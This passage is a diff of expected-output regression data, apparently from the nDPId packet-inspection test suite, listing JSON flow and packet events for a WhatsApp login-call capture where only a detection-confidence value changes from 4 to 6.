00856{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1432582258825,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1432582258825,"pkt":"xiwDYGpkAPS5Jrv0CABFwAFIgM0AAEARKS3AqAIEW\/2wQck+JIABNDV+gPhBLgAAPABUWSgkrOczzTmmNaWeHGyeFn5K8vlkangPxwACY7IwMpCpL5qUBEDYknjmXwiwt1Sg\/GoDEpuWps7K3BPScguv1CoIPKC+VL4kk69VBQy2eU1f6p0OhYSXKAcM\/9HmK5KZeJJnhjzxZ+J\/AtWZs+X8uDaujdvMYKyUONaU\/07PQLiEd81h3NGLNxCpTNYPkmMGXMy1y+UaiUzN89zB2\/RkHbLVqN6e+nvnnRR2frMRlVsFWAJQmXtD929e1+a2u\/RdJfu15HCbSLl3jTXDbl84mpeVYYxkc3LSpxB7HrCYZEpYcCniVsfACmA6zpHVbv1BlaoQu+KuUWJT2eQ73+Vh12sP5aPix21kFcGvLfE3UalmxPkTCEhiCOUQRQbTvOcEo103"} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1432582259254,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582259254,"pkt":"xiwDYGpkAPS5Jrv0CABFwABIbNAAAEAR7efAqAIEAcJav8k+65gANKlVAAEAGCESpEKmTTdqxAPLVFlkZFwACAAUe9SyVdo3\/CPkaMOU00d3jUs\/Tzg="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1432582259886,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582259886,"pkt":"xiwDYGpkAPS5Jrv0CABFwABI77MAAEARawTAqAIEAcJav8k+65gANKqSAAEAGCESpEK30Ms3\/7rzJdDOeSQACAAUjiMqFpbreAaLOXedI1Eon++y9eE="} 
00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":826,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582267983,"flow_last_seen":1432582267983,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1432582267983,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1432582267983,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1432582267983,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA44FwAAEABy33AqAIEW\/2wQQMDDx4AAAAARQAANHIMAAAvEUrCW\/2wQcCoAgQkgMk+ACAAAA=="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":826,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582267983,"flow_last_seen":1432582267983,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1432582267983,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.105516} 
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":826,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582267983,"flow_last_seen":1432582267983,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1432582267983,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.105516} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":828,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1432582267990,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1432582267990,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA4yYsAAEAB4k7AqAIEW\/2wQQMDDx8AAAAARQAAM4K1AAAvEToaW\/2wQcCoAgQkgMk+AB8AAA=="} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":830,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1432582267992,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1432582267992,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA4J2kAAEABhHHAqAIEW\/2wQQMDDx8AAAAARQAAM6fUAAAvERT7W\/2wQcCoAgQkgMk+AB8AAA=="} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":852,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582271840,"flow_last_seen":1432582271840,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1432582271840,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00864{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":852,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1432582271840,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1432582271840,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIREwAAP8RdlkAAAAA\/\/\/\/\/wBEAEMBNOdgAQEGALYzLg0AAAAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwkBAwYPd1\/8LC45AgXcPQcB2DBiVgAcMwQAdqcADApMdWNhcy1pTWFj\/wAAAAAAAAAAAAAAAAAA"} 
-00742{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":852,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582271840,"flow_last_seen":1432582271840,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1432582271840,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,3,6,15,119,95,252,44,46","class_ident":""}} +00742{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":852,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582271840,"flow_last_seen":1432582271840,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1432582271840,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,3,6,15,119,95,252,44,46","class_ident":""}} 
00864{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":853,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1432582273095,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1432582273095,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIRE0AAP8RdlgAAAAA\/\/\/\/\/wBEAEMBNOdeAQEGALYzLg0AAgAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwkBAwYPd1\/8LC45AgXcPQcB2DBiVgAcMwQAdqcADApMdWNhcy1pTWFj\/wAAAAAAAAAAAAAAAAAA"} 00864{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":854,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1432582275776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1432582275776,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIRE4AAP8RdlcAAAAA\/\/\/\/\/wBEAEMBNOdcAQEGALYzLg0ABAAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwkBAwYPd1\/8LC45AgXcPQcB2DBiVgAcMwQAdqcADApMdWNhcy1pTWFj\/wAAAAAAAAAAAAAAAAAA"} 
01131{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":855,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1432582276331,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1432582276331,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAISQGwAAEARsh7AqAIBwKgC\/0RcRFwB\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"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":859,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284805,"flow_last_seen":1432582284805,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582284805,"l3_proto":"ip4","src_ip":"169.254.166.207","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":859,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1432582284805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1432582284805,"pkt":"AQBeAAD72DBiVgAcCABFAAA+cQoAAP8RGNup\/qbP4AAA+xTpFOkAKikcAAAAAAABAAAAAAAACkx1Y2FzLWlNYWMFbG9jYWwAAByAAQ=="} 
-00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":859,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284805,"flow_last_seen":1432582284805,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582284805,"l3_proto":"ip4","src_ip":"169.254.166.207","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} +00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":859,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284805,"flow_last_seen":1432582284805,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582284805,"l3_proto":"ip4","src_ip":"169.254.166.207","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":860,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284805,"flow_last_seen":1432582284805,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582284805,"l3_proto":"ip6","src_ip":"fe80::da30:62ff:fe56:1c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":860,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1432582284805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":96,"pkt_l4_len":42,"thread_ts_msec":1432582284805,"pkt":"MzMAAAD72DBiVgAcht1gA4nLACoR\/\/6AAAAAAAAA2jBi\/\/5WABz\/AgAAAAAAAAAAAAAAAAD7FOkU6QAqIMQAAAAAAAEAAAAAAAAKTHVjYXMtaU1hYwVsb2NhbAAAHIAB"} -00696{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":860,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284805,"flow_last_seen":1432582284805,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582284805,"l3_proto":"ip6","src_ip":"fe80::da30:62ff:fe56:1c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} +00696{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":860,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284805,"flow_last_seen":1432582284805,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582284805,"l3_proto":"ip6","src_ip":"fe80::da30:62ff:fe56:1c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":861,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284806,"flow_last_seen":1432582284806,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582284806,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1432582284806,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1432582284806,"pkt":"AQBeAAD7xiwDYGpkCABFAAA+TlkAAP8RybDAqAIB4AAA+xTpFOkAKrdAAAAAAAABAAAAAAAACkx1Y2FzLWlNYWMFbG9jYWwAAByAAQ=="} -00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":861,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284806,"flow_last_seen":1432582284806,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582284806,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} 
+00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":861,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284806,"flow_last_seen":1432582284806,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582284806,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":862,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284806,"flow_last_seen":1432582284806,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582284806,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":862,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1432582284806,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":96,"pkt_l4_len":42,"thread_ts_msec":1432582284806,"pkt":"MzMAAAD7xiwDYGpkht1gAhHGACoR\/\/6AAAAAAAAAxCwD\/\/5gamT\/AgAAAAAAAAAAAAAAAAD7FOkU6QAqK3YAAAAAAAEAAAAAAAAKTHVjYXMtaU1hYwVsb2NhbAAAHIAB"} 
-00697{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":862,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284806,"flow_last_seen":1432582284806,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582284806,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} +00697{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":862,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284806,"flow_last_seen":1432582284806,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582284806,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} 
00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1432582285047,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1432582285047,"pkt":"AQBeAAD72DBiVgAcCABFAACANrsAAP8RUuip\/qbP4AAA+xTpFOkAbF25AACEAAAAAAEAAAACCkx1Y2FzLWlNYWMFbG9jYWwAAByAAQAAAHgAEP6AAAAAAAAA2jBi\/\/5WABzADAABgAEAAAB4AASp\/qbPwAwAHIABAAAAeAAQ\/oAAAAAAAADaMGL\/\/lYAHA=="} -00701{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":863,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582285047,"l3_proto":"ip4","src_ip":"169.254.166.207","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} +00701{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":863,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582285047,"l3_proto":"ip4","src_ip":"169.254.166.207","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": 
{"answer":"lucas-imac.local"}} 00590{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1432582285047,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1432582285047,"pkt":"AQBeAAD7xiwDYGpkCABFAACAD1QAAP8RCHTAqAIB4AAA+xTpFOkAbI9mAACEAAAAAAEAAAACCkx1Y2FzLWlNYWMFbG9jYWwAAByAAQAAAHgAEP6AAAAAAAAAxCwD\/\/5gamTADAABgAEAAAB4AATAqAIBwAwAHIABAAAAeAAQ\/oAAAAAAAADELAP\/\/mBqZA=="} -00697{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":864,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582285047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} +00697{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":864,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582285047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": 
